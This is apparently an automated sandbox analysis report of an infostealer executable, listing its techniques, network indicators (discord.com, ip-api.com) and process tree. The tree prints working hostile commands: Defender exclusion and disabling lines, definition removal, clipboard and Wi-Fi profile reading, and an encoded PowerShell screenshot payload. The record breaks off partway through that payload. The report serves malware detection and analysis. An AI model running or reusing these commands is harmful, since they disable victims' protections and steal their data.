fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29

Analysis

max time kernel
145s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-01-2025 04:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MadeByAbuMehmet.exe
Size

6.9MB
MD5

03bb5937fb7b74837da488b2278d0811
SHA1

51259fa1bf7608d3c394c2f7776f581d5251aa01
SHA256

fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29
SHA512

8f9a20db244661771745d353ae3669c8fa7be60ab3a68e4075de0500513b591b30ecf44e340fddcf92a09814fa4e796329dc6a49f4b309f0979c8fe73ed2e097
SSDEEP

196608:OQV1vLB6ylnlPzf+JiJCsmFMvQn6hqgdhY:TLBRlnlPSa7mmvQpgdhY

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4052	powershell.exe
2876	powershell.exe
4628	powershell.exe
3572	powershell.exe
4776	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4748	cmd.exe
64	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1048	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe
1404	MadeByAbuMehmet.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
22	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3388	tasklist.exe
4140	tasklist.exe
864	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c94-21.dat	upx
behavioral2/memory/1404-25-0x00007FFFD73B0000-0x00007FFFD799A000-memory.dmp	upx
behavioral2/files/0x0007000000023c87-27.dat	upx
behavioral2/memory/1404-29-0x00007FFFE9CE0000-0x00007FFFE9D03000-memory.dmp	upx
behavioral2/files/0x0007000000023c92-30.dat	upx
behavioral2/memory/1404-32-0x00007FFFEFC10000-0x00007FFFEFC1F000-memory.dmp	upx
behavioral2/files/0x0007000000023c8e-48.dat	upx
behavioral2/files/0x0007000000023c8d-47.dat	upx
behavioral2/files/0x0007000000023c8c-46.dat	upx
behavioral2/files/0x0007000000023c8b-45.dat	upx
behavioral2/files/0x0007000000023c8a-44.dat	upx
behavioral2/files/0x0007000000023c89-43.dat	upx
behavioral2/files/0x0007000000023c88-42.dat	upx
behavioral2/files/0x0007000000023c86-41.dat	upx
behavioral2/files/0x0007000000023c99-40.dat	upx
behavioral2/files/0x0007000000023c98-39.dat	upx
behavioral2/files/0x0007000000023c97-38.dat	upx
behavioral2/files/0x0007000000023c93-35.dat	upx
behavioral2/files/0x0007000000023c91-34.dat	upx
behavioral2/memory/1404-54-0x00007FFFE9BB0000-0x00007FFFE9BDD000-memory.dmp	upx
behavioral2/memory/1404-56-0x00007FFFEC3E0000-0x00007FFFEC3F9000-memory.dmp	upx
behavioral2/memory/1404-58-0x00007FFFE6290000-0x00007FFFE62B3000-memory.dmp	upx
behavioral2/memory/1404-60-0x00007FFFE54C0000-0x00007FFFE562F000-memory.dmp	upx
behavioral2/memory/1404-62-0x00007FFFEAEA0000-0x00007FFFEAEB9000-memory.dmp	upx
behavioral2/memory/1404-64-0x00007FFFE9D20000-0x00007FFFE9D2D000-memory.dmp	upx
behavioral2/memory/1404-66-0x00007FFFE6260000-0x00007FFFE628E000-memory.dmp	upx
behavioral2/memory/1404-74-0x00007FFFE9CE0000-0x00007FFFE9D03000-memory.dmp	upx
behavioral2/memory/1404-73-0x00007FFFD7030000-0x00007FFFD73A5000-memory.dmp	upx
behavioral2/memory/1404-80-0x00007FFFE9BA0000-0x00007FFFE9BAD000-memory.dmp	upx
behavioral2/memory/1404-79-0x00007FFFE9BB0000-0x00007FFFE9BDD000-memory.dmp	upx
behavioral2/memory/1404-77-0x00007FFFE5F10000-0x00007FFFE5F24000-memory.dmp	upx
behavioral2/memory/1404-76-0x00007FFFEFC10000-0x00007FFFEFC1F000-memory.dmp	upx
behavioral2/memory/1404-84-0x00007FFFD6C60000-0x00007FFFD6D7C000-memory.dmp	upx
behavioral2/memory/1404-71-0x00007FFFE5760000-0x00007FFFE5818000-memory.dmp	upx
behavioral2/memory/1404-70-0x00007FFFD73B0000-0x00007FFFD799A000-memory.dmp	upx
behavioral2/memory/1404-125-0x00007FFFE6290000-0x00007FFFE62B3000-memory.dmp	upx
behavioral2/memory/1404-167-0x00007FFFE54C0000-0x00007FFFE562F000-memory.dmp	upx
behavioral2/memory/1404-196-0x00007FFFEAEA0000-0x00007FFFEAEB9000-memory.dmp	upx
behavioral2/memory/1404-252-0x00007FFFE9D20000-0x00007FFFE9D2D000-memory.dmp	upx
behavioral2/memory/1404-256-0x00007FFFE6260000-0x00007FFFE628E000-memory.dmp	upx
behavioral2/memory/1404-274-0x00007FFFE5760000-0x00007FFFE5818000-memory.dmp	upx
behavioral2/memory/1404-276-0x00007FFFD7030000-0x00007FFFD73A5000-memory.dmp	upx
behavioral2/memory/1404-297-0x00007FFFD73B0000-0x00007FFFD799A000-memory.dmp	upx
behavioral2/memory/1404-303-0x00007FFFE54C0000-0x00007FFFE562F000-memory.dmp	upx
behavioral2/memory/1404-298-0x00007FFFE9CE0000-0x00007FFFE9D03000-memory.dmp	upx
behavioral2/memory/1404-312-0x00007FFFD73B0000-0x00007FFFD799A000-memory.dmp	upx
behavioral2/memory/1404-340-0x00007FFFD6C60000-0x00007FFFD6D7C000-memory.dmp	upx
behavioral2/memory/1404-339-0x00007FFFE9BA0000-0x00007FFFE9BAD000-memory.dmp	upx
behavioral2/memory/1404-338-0x00007FFFE5F10000-0x00007FFFE5F24000-memory.dmp	upx
behavioral2/memory/1404-337-0x00007FFFE5760000-0x00007FFFE5818000-memory.dmp	upx
behavioral2/memory/1404-336-0x00007FFFE6260000-0x00007FFFE628E000-memory.dmp	upx
behavioral2/memory/1404-335-0x00007FFFE9D20000-0x00007FFFE9D2D000-memory.dmp	upx
behavioral2/memory/1404-334-0x00007FFFEAEA0000-0x00007FFFEAEB9000-memory.dmp	upx
behavioral2/memory/1404-333-0x00007FFFE54C0000-0x00007FFFE562F000-memory.dmp	upx
behavioral2/memory/1404-332-0x00007FFFE6290000-0x00007FFFE62B3000-memory.dmp	upx
behavioral2/memory/1404-331-0x00007FFFEC3E0000-0x00007FFFEC3F9000-memory.dmp	upx
behavioral2/memory/1404-330-0x00007FFFE9BB0000-0x00007FFFE9BDD000-memory.dmp	upx
behavioral2/memory/1404-329-0x00007FFFEFC10000-0x00007FFFEFC1F000-memory.dmp	upx
behavioral2/memory/1404-328-0x00007FFFE9CE0000-0x00007FFFE9D03000-memory.dmp	upx
behavioral2/memory/1404-327-0x00007FFFD7030000-0x00007FFFD73A5000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4700	cmd.exe
2940	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4008	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4260	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
4052	powershell.exe
4052	powershell.exe
4776	powershell.exe
4776	powershell.exe
3572	powershell.exe
3572	powershell.exe
3572	powershell.exe
4776	powershell.exe
4776	powershell.exe
4824	powershell.exe
4824	powershell.exe
4052	powershell.exe
4052	powershell.exe
4824	powershell.exe
2876	powershell.exe
2876	powershell.exe
3204	powershell.exe
3204	powershell.exe
4628	powershell.exe
4628	powershell.exe
1604	powershell.exe
1604	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3388	tasklist.exe
Token: SeDebugPrivilege	4140	tasklist.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeIncreaseQuotaPrivilege	2004	WMIC.exe
Token: SeSecurityPrivilege	2004	WMIC.exe
Token: SeTakeOwnershipPrivilege	2004	WMIC.exe
Token: SeLoadDriverPrivilege	2004	WMIC.exe
Token: SeSystemProfilePrivilege	2004	WMIC.exe
Token: SeSystemtimePrivilege	2004	WMIC.exe
Token: SeProfSingleProcessPrivilege	2004	WMIC.exe
Token: SeIncBasePriorityPrivilege	2004	WMIC.exe
Token: SeCreatePagefilePrivilege	2004	WMIC.exe
Token: SeBackupPrivilege	2004	WMIC.exe
Token: SeRestorePrivilege	2004	WMIC.exe
Token: SeShutdownPrivilege	2004	WMIC.exe
Token: SeDebugPrivilege	2004	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2004	WMIC.exe
Token: SeRemoteShutdownPrivilege	2004	WMIC.exe
Token: SeUndockPrivilege	2004	WMIC.exe
Token: SeManageVolumePrivilege	2004	WMIC.exe
Token: 33	2004	WMIC.exe
Token: 34	2004	WMIC.exe
Token: 35	2004	WMIC.exe
Token: 36	2004	WMIC.exe
Token: SeDebugPrivilege	864	tasklist.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeIncreaseQuotaPrivilege	2004	WMIC.exe
Token: SeSecurityPrivilege	2004	WMIC.exe
Token: SeTakeOwnershipPrivilege	2004	WMIC.exe
Token: SeLoadDriverPrivilege	2004	WMIC.exe
Token: SeSystemProfilePrivilege	2004	WMIC.exe
Token: SeSystemtimePrivilege	2004	WMIC.exe
Token: SeProfSingleProcessPrivilege	2004	WMIC.exe
Token: SeIncBasePriorityPrivilege	2004	WMIC.exe
Token: SeCreatePagefilePrivilege	2004	WMIC.exe
Token: SeBackupPrivilege	2004	WMIC.exe
Token: SeRestorePrivilege	2004	WMIC.exe
Token: SeShutdownPrivilege	2004	WMIC.exe
Token: SeDebugPrivilege	2004	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2004	WMIC.exe
Token: SeRemoteShutdownPrivilege	2004	WMIC.exe
Token: SeUndockPrivilege	2004	WMIC.exe
Token: SeManageVolumePrivilege	2004	WMIC.exe
Token: 33	2004	WMIC.exe
Token: 34	2004	WMIC.exe
Token: 35	2004	WMIC.exe
Token: 36	2004	WMIC.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeIncreaseQuotaPrivilege	4388	WMIC.exe
Token: SeSecurityPrivilege	4388	WMIC.exe
Token: SeTakeOwnershipPrivilege	4388	WMIC.exe
Token: SeLoadDriverPrivilege	4388	WMIC.exe
Token: SeSystemProfilePrivilege	4388	WMIC.exe
Token: SeSystemtimePrivilege	4388	WMIC.exe
Token: SeProfSingleProcessPrivilege	4388	WMIC.exe
Token: SeIncBasePriorityPrivilege	4388	WMIC.exe
Token: SeCreatePagefilePrivilege	4388	WMIC.exe
Token: SeBackupPrivilege	4388	WMIC.exe
Token: SeRestorePrivilege	4388	WMIC.exe
Token: SeShutdownPrivilege	4388	WMIC.exe
Token: SeDebugPrivilege	4388	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4732 wrote to memory of 1404	4732	MadeByAbuMehmet.exe	83
PID 4732 wrote to memory of 1404	4732	MadeByAbuMehmet.exe	83
PID 1404 wrote to memory of 4384	1404	MadeByAbuMehmet.exe	84
PID 1404 wrote to memory of 4384	1404	MadeByAbuMehmet.exe	84
PID 1404 wrote to memory of 1988	1404	MadeByAbuMehmet.exe	85
PID 1404 wrote to memory of 1988	1404	MadeByAbuMehmet.exe	85
PID 1404 wrote to memory of 1848	1404	MadeByAbuMehmet.exe	88
PID 1404 wrote to memory of 1848	1404	MadeByAbuMehmet.exe	88
PID 1404 wrote to memory of 3640	1404	MadeByAbuMehmet.exe	90
PID 1404 wrote to memory of 3640	1404	MadeByAbuMehmet.exe	90
PID 1404 wrote to memory of 4228	1404	MadeByAbuMehmet.exe	91
PID 1404 wrote to memory of 4228	1404	MadeByAbuMehmet.exe	91
PID 3640 wrote to memory of 3388	3640	cmd.exe	94
PID 3640 wrote to memory of 3388	3640	cmd.exe	94
PID 4384 wrote to memory of 3572	4384	cmd.exe	95
PID 4384 wrote to memory of 3572	4384	cmd.exe	95
PID 1988 wrote to memory of 4052	1988	cmd.exe	96
PID 1988 wrote to memory of 4052	1988	cmd.exe	96
PID 4228 wrote to memory of 4140	4228	cmd.exe	97
PID 4228 wrote to memory of 4140	4228	cmd.exe	97
PID 1848 wrote to memory of 4776	1848	cmd.exe	98
PID 1848 wrote to memory of 4776	1848	cmd.exe	98
PID 1404 wrote to memory of 3580	1404	MadeByAbuMehmet.exe	99
PID 1404 wrote to memory of 3580	1404	MadeByAbuMehmet.exe	99
PID 1404 wrote to memory of 4748	1404	MadeByAbuMehmet.exe	100
PID 1404 wrote to memory of 4748	1404	MadeByAbuMehmet.exe	100
PID 1404 wrote to memory of 3668	1404	MadeByAbuMehmet.exe	103
PID 1404 wrote to memory of 3668	1404	MadeByAbuMehmet.exe	103
PID 1404 wrote to memory of 3888	1404	MadeByAbuMehmet.exe	104
PID 1404 wrote to memory of 3888	1404	MadeByAbuMehmet.exe	104
PID 1404 wrote to memory of 4700	1404	MadeByAbuMehmet.exe	107
PID 1404 wrote to memory of 4700	1404	MadeByAbuMehmet.exe	107
PID 1404 wrote to memory of 2664	1404	MadeByAbuMehmet.exe	109
PID 1404 wrote to memory of 2664	1404	MadeByAbuMehmet.exe	109
PID 1404 wrote to memory of 712	1404	MadeByAbuMehmet.exe	112
PID 1404 wrote to memory of 712	1404	MadeByAbuMehmet.exe	112
PID 3580 wrote to memory of 2004	3580	cmd.exe	114
PID 3580 wrote to memory of 2004	3580	cmd.exe	114
PID 3668 wrote to memory of 864	3668	cmd.exe	115
PID 3668 wrote to memory of 864	3668	cmd.exe	115
PID 4700 wrote to memory of 2940	4700	cmd.exe	116
PID 4700 wrote to memory of 2940	4700	cmd.exe	116
PID 4748 wrote to memory of 64	4748	cmd.exe	117
PID 4748 wrote to memory of 64	4748	cmd.exe	117
PID 2664 wrote to memory of 4260	2664	cmd.exe	118
PID 2664 wrote to memory of 4260	2664	cmd.exe	118
PID 712 wrote to memory of 4824	712	cmd.exe	119
PID 712 wrote to memory of 4824	712	cmd.exe	119
PID 3888 wrote to memory of 836	3888	cmd.exe	120
PID 3888 wrote to memory of 836	3888	cmd.exe	120
PID 1404 wrote to memory of 684	1404	MadeByAbuMehmet.exe	121
PID 1404 wrote to memory of 684	1404	MadeByAbuMehmet.exe	121
PID 684 wrote to memory of 208	684	cmd.exe	123
PID 684 wrote to memory of 208	684	cmd.exe	123
PID 1404 wrote to memory of 4712	1404	MadeByAbuMehmet.exe	124
PID 1404 wrote to memory of 4712	1404	MadeByAbuMehmet.exe	124
PID 4712 wrote to memory of 1500	4712	cmd.exe	126
PID 4712 wrote to memory of 1500	4712	cmd.exe	126
PID 1404 wrote to memory of 860	1404	MadeByAbuMehmet.exe	127
PID 1404 wrote to memory of 860	1404	MadeByAbuMehmet.exe	127
PID 860 wrote to memory of 1820	860	cmd.exe	130
PID 860 wrote to memory of 1820	860	cmd.exe	130
PID 1404 wrote to memory of 1776	1404	MadeByAbuMehmet.exe	131
PID 1404 wrote to memory of 1776	1404	MadeByAbuMehmet.exe	131

C:\Users\Admin\AppData\Local\Temp\MadeByAbuMehmet.exe
"C:\Users\Admin\AppData\Local\Temp\MadeByAbuMehmet.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4732
- C:\Users\Admin\AppData\Local\Temp\MadeByAbuMehmet.exe
  "C:\Users\Admin\AppData\Local\Temp\MadeByAbuMehmet.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MadeByAbuMehmet.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MadeByAbuMehmet.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4228
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3580
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3668
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3888
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4700
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2664
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8A